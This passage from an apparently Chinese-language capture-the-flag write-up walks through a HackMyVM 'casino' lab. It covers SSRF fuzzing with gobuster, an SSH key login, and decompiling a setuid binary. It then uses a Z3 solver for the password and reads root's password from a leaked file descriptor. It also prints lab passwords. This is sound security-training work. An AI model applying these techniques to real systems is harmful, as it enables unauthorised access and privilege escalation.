src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527075.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321135307932\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u6837\u8fc7\u6ee4\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u 
&quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527076.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527076.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321135541312\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -b 400 -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot; <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527077.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527077.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140504464\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">Found: [Status=200] [Length=1407] [Word=codebreakers] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/codebreakers\n\nFound: [Status=200] [Length=22090] [Word=server-status] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/server-status\n\nFound: [Status=200] [Length=1969] [Word=%3FRID%3D2671] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/%3FRID%3D2671<\/code><\/pre>\n<p>\u6328\u4e2a\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527078.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527078.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140550358\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527079.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527079.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140604238\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527080.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527080.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140639780\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u767b\u5f55\u5bc6\u94a5\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff01<\/p>\n<pre><code class=\"language-bash\">chmod 600 fuck_rsa\nssh shimmer@10.160.52.102 -i fuck_rsa<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527081.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527081.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140900129\" style=\"zoom:67%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527082.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527082.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321141026071\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\u3002<\/p>\n<pre><code class=\"language-apl\">casinousergobrrr<\/code><\/pre>\n<pre><code class=\"language-bash\">shimmer@casino:~$ file pass\n# pass: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=69534d98e628cad52c35ba899c71650dc0e48bdf, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n<p>\u884c\u5427\uff0c\u7b49\u4e0b\u4f20\u8fc7\u6765\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">shimmer@casino:~$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/home\/shimmer\/pass\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh<\/code><\/pre>\n<p>\u770b\u6765\u5c31\u662f\u8ba9\u6211\u4eec\u5206\u6790\u8fd9\u4e2a<code>pass<\/code>\u7a0b\u5e8f\u4e86\u3002\u3002\u3002\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527083.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527083.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321142031672\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u4e22\u8fdb<code>ida<\/code>\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __uid_t v3; \/\/ eax\n  char s1[112]; \/\/ [rsp+10h] [rbp-F0h]\n  char *argva; \/\/ [rsp+80h] [rbp-80h]\n  __int64 v7; \/\/ [rsp+88h] [rbp-78h]\n  char s[108]; \/\/ [rsp+90h] [rbp-70h]\n  int v9; \/\/ [rsp+FCh] [rbp-4h]\n\n  printf(&quot;Passwd: &quot;, argv, envp, argv);\n  fgets(s, 100, stdin);\n  if ( s[strlen(s) - 1] == 10 )\n    s[strlen(s) - 1] = 0;\n  if ( (unsigned int)checkPasswd(s, 100LL) != 1 )\n    return 0;\n  v9 = open(&quot;\/opt\/root.pass&quot;, 0);\n  v3 = getuid();\n  setuid(v3);\n  printf(&quot;Second Passwd: &quot;);\n  fgets(s1, 100, stdin);\n  if ( 
s1[strlen(s1) - 1] == 10 )\n    s1[strlen(s1) - 1] = 0;\n  if ( !strcmp(s1, &quot;ultrasecretpassword&quot;) )\n  {\n    argva = &quot;sh&quot;;\n    v7 = 0LL;\n    execvp(&quot;\/bin\/sh&quot;, &amp;argva);\n  }\n  else\n  {\n    puts(&quot;bye.&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<ol>\n<li>\u7a0b\u5e8f\u5f00\u59cb\u65f6\uff0c\u63d0\u793a\u7528\u6237\u8f93\u5165\u5bc6\u7801\uff08\u901a\u8fc7 <code>printf<\/code> \u51fd\u6570\uff09\uff0c\u7136\u540e\u4ece\u6807\u51c6\u8f93\u5165\uff08stdin\uff09\u4e2d\u83b7\u53d6\u7528\u6237\u8f93\u5165\u7684\u5bc6\u7801\uff08\u901a\u8fc7 <code>fgets<\/code> \u51fd\u6570\uff09\u3002\u83b7\u53d6\u7684\u5bc6\u7801\u5b58\u50a8\u5728\u5b57\u7b26\u6570\u7ec4 <code>s<\/code> \u4e2d\u3002<\/li>\n<li>\u7136\u540e\u68c0\u67e5\u8f93\u5165\u7684\u5bc6\u7801\u662f\u5426\u6b63\u786e\uff0c\u8c03\u7528 <code>checkPasswd<\/code> \u51fd\u6570\u8fdb\u884c\u9a8c\u8bc1\u3002\u5982\u679c\u5bc6\u7801\u4e0d\u6b63\u786e\uff0c\u5219\u7a0b\u5e8f\u76f4\u63a5\u8fd4\u56de\uff0c\u4e0d\u6267\u884c\u540e\u7eed\u64cd\u4f5c\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e00\u4e2a\u5bc6\u7801\u9a8c\u8bc1\u901a\u8fc7\uff0c\u5219\u5c1d\u8bd5\u6253\u5f00\u6587\u4ef6 <code>\/opt\/root.pass<\/code>\uff08\u901a\u8fc7 <code>open<\/code> \u51fd\u6570\uff09\u3002\u7136\u540e\u83b7\u53d6\u5f53\u524d\u7528\u6237\u7684\u7528\u6237 ID\uff08UID\uff09\uff08\u901a\u8fc7 <code>getuid<\/code> \u51fd\u6570\uff09\uff0c\u5e76\u4f7f\u7528 <code>setuid<\/code> \u51fd\u6570\u5c06\u7a0b\u5e8f\u7684\u6709\u6548\u7528\u6237 ID\uff08EUID\uff09\u8bbe\u7f6e\u4e3a\u5f53\u524d\u7528\u6237\u7684 UID\u3002<\/li>\n<li>\u7a0b\u5e8f\u63a5\u7740\u63d0\u793a\u7528\u6237\u8f93\u5165\u7b2c\u4e8c\u4e2a\u5bc6\u7801\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u5b57\u7b26\u6570\u7ec4 <code>s1<\/code> \u4e2d\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e8c\u4e2a\u5bc6\u7801\u662f <code>ultrasecretpassword<\/code>\uff0c\u5219\u5c06 <code>argva<\/code> \u8bbe\u7f6e\u4e3a &quot;sh&quot;\uff0c\u5c06 <code>v7<\/code> 
\u8bbe\u7f6e\u4e3a 0\uff0c\u7136\u540e\u8c03\u7528 <code>execvp<\/code> \u51fd\u6570\u4ee5\u6267\u884c &quot;\/bin\/sh&quot;\uff0c\u4ece\u800c\u6253\u5f00\u4e00\u4e2a shell\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e8c\u4e2a\u5bc6\u7801\u4e0d\u662f <code>ultrasecretpassword<\/code>\uff0c\u5219\u7a0b\u5e8f\u6253\u5370 <code>bye.<\/code> \u5e76\u8fd4\u56de\u3002<\/li>\n<\/ol>\n<pre><code class=\"language-c\">\/\/ checkPasswd\nsigned __int64 __fastcall checkPasswd(const char *a1)\n{\n  signed __int64 result; \/\/ rax\n\n  if ( strlen(a1) == 26 )\n  {\n    if ( *a1 - a1[20] == -10 )\n    {\n      if ( a1[1] + a1[6] == 208 )\n      {\n        if ( a1[2] - a1[4] == 10 )\n        {\n          if ( a1[3] - a1[14] == -2 )\n          {\n            if ( a1[4] * a1[25] == 10100 )\n            {\n              if ( a1[5] + a1[17] == 219 )\n              {\n                if ( a1[6] - a1[10] == -11 )\n                {\n                  if ( a1[7] - a1[20] == -10 )\n                  {\n                    if ( a1[8] * a1[17] == 11845 )\n                    {\n                      if ( a1[9] - a1[18] == -7 )\n                      {\n                        if ( a1[10] - a1[24] == 1 )\n                        {\n                          if ( a1[11] * a1[4] == 9797 )\n                          {\n                            if ( a1[12] - a1[3] == 3 )\n                            {\n                              if ( a1[13] * a1[11] == 11252 )\n                              {\n                                if ( a1[14] - a1[13] == -2 )\n                                {\n                                  if ( a1[15] == a1[23] )\n                                  {\n                                    if ( a1[16] - a1[8] == -5 )\n                                    {\n                                      if ( a1[17] * a1[7] == 10815 )\n                                      {\n                                        if ( a1[18] - a1[14] == -2 )\n                                   
     {\n                                          if ( a1[19] - *a1 == -8 )\n                                          {\n                                            if ( a1[20] - a1[23] == 4 )\n                                            {\n                                              if ( a1[21] + a1[7] == 220 )\n                                              {\n                                                if ( a1[22] - a1[1] == 15 )\n                                                {\n                                                  if ( a1[23] == a1[15] )\n                                                  {\n                                                    if ( a1[24] * a1[2] == 12654 )\n                                                    {\n                                                      if ( a1[25] - a1[12] == -15 )\n                                                      {\n                                                        puts(&quot;Correct pass&quot;);\n                                                        result = 1LL;\n                                                      }\n                                                      else\n                                                      {\n                                                        result = 0LL;\n                                                      }\n                                                    }\n                                                    else\n                                                    {\n                                                      result = 0LL;\n                                                    }\n                                                  }\n                                                  else\n                                                  {\n                                                    result = 0LL;\n                                                  }\n                                                }\n         
                                       else\n                                                {\n                                                  result = 0LL;\n                                                }\n                                              }\n                                              else\n                                              {\n                                                result = 0LL;\n                                              }\n                                            }\n                                            else\n                                            {\n                                              result = 0LL;\n                                            }\n                                          }\n                                          else\n                                          {\n                                            result = 0LL;\n                                          }\n                                        }\n                                        else\n                                        {\n                                          result = 0LL;\n                                        }\n                                      }\n                                      else\n                                      {\n                                        result = 0LL;\n                                      }\n                                    }\n                                    else\n                                    {\n                                      result = 0LL;\n                                    }\n                                  }\n                                  else\n                                  {\n                                    result = 0LL;\n                                  }\n                                }\n                                else\n                                {\n                                  result = 0LL;\n       
                         }\n                              }\n                              else\n                              {\n                                result = 0LL;\n                              }\n                            }\n                            else\n                            {\n                              result = 0LL;\n                            }\n                          }\n                          else\n                          {\n                            result = 0LL;\n                          }\n                        }\n                        else\n                        {\n                          result = 0LL;\n                        }\n                      }\n                      else\n                      {\n                        result = 0LL;\n                      }\n                    }\n                    else\n                    {\n                      result = 0LL;\n                    }\n                  }\n                  else\n                  {\n                    result = 0LL;\n                  }\n                }\n                else\n                {\n                  result = 0LL;\n                }\n              }\n              else\n              {\n                result = 0LL;\n              }\n            }\n            else\n            {\n              result = 0LL;\n            }\n          }\n          else\n          {\n            result = 0LL;\n          }\n        }\n        else\n        {\n          result = 0LL;\n        }\n      }\n      else\n      {\n        result = 0LL;\n      }\n    }\n    else\n    {\n      result = 0LL;\n    }\n  }\n  else\n  {\n    puts(&quot;Incorrect pass&quot;);\n    result = 0LL;\n  }\n  return result;\n}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5199\u4e00\u4e2a\u811a\u672c\uff0c\u8f93\u51fa\u6ee1\u8db3\u8981\u6c42\u7684\u5b57\u7b26\u4e32\uff0c\u7ecf\u8fc7\u7fa4\u53cb<a 
href=\"https:\/\/hackmyvm.eu\/profile\/?user=fl0w\">FLOW<\/a>\u63d0\u70b9\uff0c\u77e5\u9053\u4f7f\u7528<code>Z3<\/code>\u5e93\u53ef\u4ee5\u505a\u8fd9\u4ef6\u4e8b\u60c5\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.cnblogs.com\/runwu2204\/articles\/17008164.html\">https:\/\/www.cnblogs.com\/runwu2204\/articles\/17008164.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/weixin_52369224\/article\/details\/120922901\">https:\/\/blog.csdn.net\/weixin_52369224\/article\/details\/120922901<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-python\">from z3 import *\n\n# \u521b\u5efa26\u4e2a\u53d8\u91cf\uff0c\u6bcf\u4e2a\u53d8\u91cf\u8868\u793a\u5b57\u7b26\u4e32\u4e2d\u5bf9\u5e94\u4f4d\u7f6e\u7684\u5b57\u7b26\na = [Int(&#039;a[%d]&#039; % i) for i in range(26)]\n\n# \u521b\u5efa\u4e00\u4e2a Z3 solver \u5b9e\u4f8b\nsolver = Solver()\n\n# \u6dfb\u52a0\u5b57\u7b26\u4e32\u957f\u5ea6\u7b49\u4e8e 26 \u7684\u7ea6\u675f\nsolver.add(len(a) == 26)\n\n# \u7ea6\u675f\u6761\u4ef6\u5217\u8868\nconstraints = [\n    a[0] - a[20] == -10,\n    a[1] + a[6] == 208,\n    a[2] - a[4] == 10,\n    a[3] - a[14] == -2,\n    a[4] * a[25] == 10100,\n    a[5] + a[17] == 219,\n    a[6] - a[10] == -11,\n    a[7] - a[20] == -10,\n    a[8] * a[17] == 11845,\n    a[9] - a[18] == -7,\n    a[10] - a[24] == 1,\n    a[11] * a[4] == 9797,\n    a[12] - a[3] == 3,\n    a[13] * a[11] == 11252,\n    a[14] - a[13] == -2,\n    a[15] == a[23],\n    a[16] - a[8] == -5,\n    a[17] * a[7] == 10815,\n    a[18] - a[14] == -2,\n    a[19] - a[0] == -8,\n    a[20] - a[23] == 4,\n    a[21] + a[7] == 220,\n    a[22] - a[1] == 15,\n    a[23] == a[15],\n    a[24] * a[2] == 12654,\n    a[25] - a[12] == -15\n]\n\n# \u6dfb\u52a0\u7ea6\u675f\u6761\u4ef6\nfor constraint in constraints:\n    solver.add(constraint)\n\n# \u68c0\u67e5\u7ea6\u675f\u662f\u5426\u6ee1\u8db3\nif solver.check() == sat:\n    model = solver.model()\n    result = &#039;&#039;.join([chr(model[a[i]].as_long()) for i in range(26)])\n    
print(&quot;\u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32\u4e3a\uff1a&quot;, result)\nelse:\n    print(&quot;\u627e\u4e0d\u5230\u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32&quot;)\n# \u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32\u4e3a\uff1a ihopethisisastrongpassword<\/code><\/pre>\n<pre><code class=\"language-apl\">ihopethisisastrongpassword\nultrasecretpassword<\/code><\/pre>\n<p>\u5230\u8fd9\u91cc\u5c31\u6ca1\u8f99\u4e86\uff0c\u770b\u4f5c\u8005\u89c6\u9891\u6837\u5b50\u662f\u628a\u8f93\u51fa\u91cd\u5b9a\u5411\u5230\u4e86\u4f2a\u7ec8\u7aef\uff0c\u6240\u4ee5\u5207\u6362\u5230\u4f2a\u7ec8\u7aef\uff0c\u53d1\u73b0root\u5bc6\u7801\uff0c\u8bb0\u5f55\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/proc\ncd self\ncd fd\nls -la\ncat &lt;&amp;3<\/code><\/pre>\n<p>\u539f\u7406\uff1amain \u4e2d <code>open<\/code> \u6253\u5f00 <code>\/opt\/root.pass<\/code> \u83b7\u53d6\u7684\u6587\u4ef6\u63cf\u8ff0\u7b26\u5728 <code>setuid<\/code> \u540e\u6ca1\u6709 <code>close<\/code>\uff0c<code>execvp<\/code> \u6267\u884c\u7684 shell \u7ee7\u627f\u4e86\u8fd9\u4e2a\u63cf\u8ff0\u7b26\uff08\u8fd9\u91cc\u662f fd 3\uff09\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u4ece\u4e2d\u83b7\u53d6 root \u5bc6\u7801\u3002\u6b63\u786e\u7684\u505a\u6cd5\u662f\u5728 <code>execvp<\/code> \u524d <code>close<\/code> \u8fd9\u4e2a\u63cf\u8ff0\u7b26\uff0c\u6216\u5728 <code>open<\/code> \u65f6\u4f7f\u7528 <code>O_CLOEXEC<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527084.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527084.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321152331818\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5b9e\u9645\u4e0a\u8fd9\u91cc\u4f20\u4e2a<code>linpeas.sh<\/code>\u662f\u53ef\u4ee5\u641c\u96c6\u5230\u4fe1\u606f\u7684\u3002<\/p>\n<pre><code class=\"language-apl\">symboliclove4u<\/code><\/pre>\n<h2>\u8865\u5145<\/h2>\n<p>\u7ecf\u8fc7<a href=\"https:\/\/hackmyvm.eu\/profile\/?user=ll104567\">ll104567<\/a>\u5e08\u5085\u7684\u63d0\u70b9\uff0c\u77e5\u9053\u4e86\u539f\u7406\uff1a<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723478.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723478.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172159416\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723231.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723231.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172309551\" style=\"zoom: 33%;\" 